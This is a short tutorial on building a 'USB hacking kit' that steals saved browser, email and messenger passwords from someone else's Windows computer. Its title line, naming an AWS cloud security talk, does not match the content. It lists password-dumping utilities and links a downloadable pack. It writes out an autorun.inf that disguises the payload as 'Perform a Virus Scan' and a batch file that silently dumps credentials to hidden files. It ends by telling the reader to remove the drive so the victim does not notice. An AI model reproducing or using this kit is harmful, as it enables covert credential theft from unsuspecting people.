AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
Usb hack
1. [?IMG]
You can use your pen-drive on any computer to sniff the stored passwords
What is the Logic behind this Hacking Trick?
As we all know that whenever we visits any website then we have to enter
username and password. If we have to visit the site daily then
to avoid entering the username and password again and again we just check on
remember me on that time.
By checking remember me option we allows windows to save our username and
password. And here in this trick we will get the password by a USB Drive i.e. we
need not to open any browser.
Which passwords we can hack by using this hacking tool?
All passwords which are saved in any windows browser, can be hacked using this
trick.
ex: Outlook Express password, Yahoo Messenger password etc.
What things we will need?
IE PassView: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 – v6.0
MessenPass: MessenPass is a password recovery tool that reveals the passwords of
following most popular Instant Messenger programs:
* MSN Messenger
* Windows Messenger
* Windows Live Messenger
* Yahoo Messenger (Versions 5.x and 6.x)
* Google Talk etc
* AOL Messenger provided with Netscape 7
Mail PassView: Mail PassView is the password recovery tool that reveals the
password and other account details for the following email clients:
* Outlook Express
* Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
* Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
* Windows Mail
* Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
* IncrediMail
* Eudora
* Netscape Mail
* Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger
application.
* Gmail - If the password is saved by Gmail Notifier application, Google
Desktop, or by Google Talk & etc.
In Mail PassView for each email account, the following fields are displayed:
Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User
Name and Password.
PasswordFox: PasswordFox is a small password recovery tool that allows you to
view the user names and passwords stored by Mozilla Firefox Web browser. By
default, PasswordFox displays the passwords stored in your current profile, but
you can easily select to watch the passwords of any other Firefox profile. For
each password entry, the following information is displayed: Record Index, Web
Site, User Name, Password, User Name Field, Password Field, and the Signons
filename.
Protected Storage PassView: Protected Storage PassView is a small utility that
reveals the passwords stored on your computer by Internet Explorer, Outlook
Express and MSN Explorer. The passwords are revealed by reading the information
from the Protected Storage.
2. ChromePass: It is a small password recovery tool for Windows that allows you to
view the user names and passwords stored by Google Chrome Web browser. For each
password entry, the following information is displayed: Origin URL, Action URL,
User Name Field, Password Field, User Name, Password, and Created Time. You can
select one or more items and then save them into text/html/xml file or copy them
to the clipboard.
I have uploaded all these hacking tools in one single pack click the below
download button to download.
GET IT HERE :http://www.mediafire.com/download/5ee5nkpb6y5ztp1/password recovery
tool shared by tekspot.rar
Now follow the steps to create USB Hacking kit:
1. Download all the 6 tools, extract and copy only the executables (.exe) files
to your USB Drive.
For ex: Copy the files named as - iepv.exe, mspass.exe, mailpv.exe,
passwordfox.exe, pspv.exe, chromepass.exe
Copy all above files to your USB Drive and make them hidden so that no one will
be able to notice them.
2. Now open a Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Save it as autorun.inf
3. Now open an another Notepad window and copy the following text onto it
start iepv.exe /stext iepv.txt
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start passwordfox.exe /stext passwordfox.txt
start pspv.exe /stext pspv.txt
start ChromePass.exe /stext chromePass.txt
Now save the file as launch.bat
Now copy both files autorun.inf & launch.bat to your pendrive.
Now your USB hacking kit is ready to use.
You can use this pen-drive on any computer to sniff the stored passwords. Just
follow the steps given below:
1. Insert the pendrive to the target PC the autorun window will pop-up. (This is
because, we have created an autorun in pendrive).
2. In the pop-up window, user must select the first option (Perform a Virus
Scan).
3. Now all the password hacking tools will silently get executed in the
background (This process takes hardly a few seconds). The passwords get stored
in the form of .txt files in the pendrive.
4. Now just plug out the pendrive so that your victim will not be able to notice
what you have done with his computer.
And see the stored passwords in the .txt files
Note that this hacking trick will only reveal the passwords stored in that
computer.